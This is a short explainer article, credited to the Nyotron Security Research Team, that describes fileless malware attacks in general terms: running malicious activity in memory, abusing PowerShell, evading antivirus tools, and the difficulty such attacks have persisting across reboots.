What is a Fileless Attack?

By Nyotron Security Research Team

Leaving footprints on a victim’s machine is something most malware writers wish to avoid for various reasons such as making the victim aware of the malicious activities, making it harder for security researchers to analyze the attack and bypassing AV Software.

The most obvious footprint is placing the executable on the machine, but more and more published attacks show that malware writers are using fileless attacks, meaning that all of the malicious activities are performed in memory instead of placing the malicious executable on the disk.

An example of such an attack is using PowerShell, a legitimate Microsoft Framework used to execute malicious activities, which have nearly unlimited damage potential due to it’s abilities (from downloading/uploading data to a remote server to encrypting the user’s files).

The cons of using a fileless attack is survivability. While making an executable execute after reboot by placing it in various locations in the Registry or file-system is easy enough, making a malicious piece of code that runs in memory execute after the system reboots is not trivial.

Source: InfoSecurity Magazine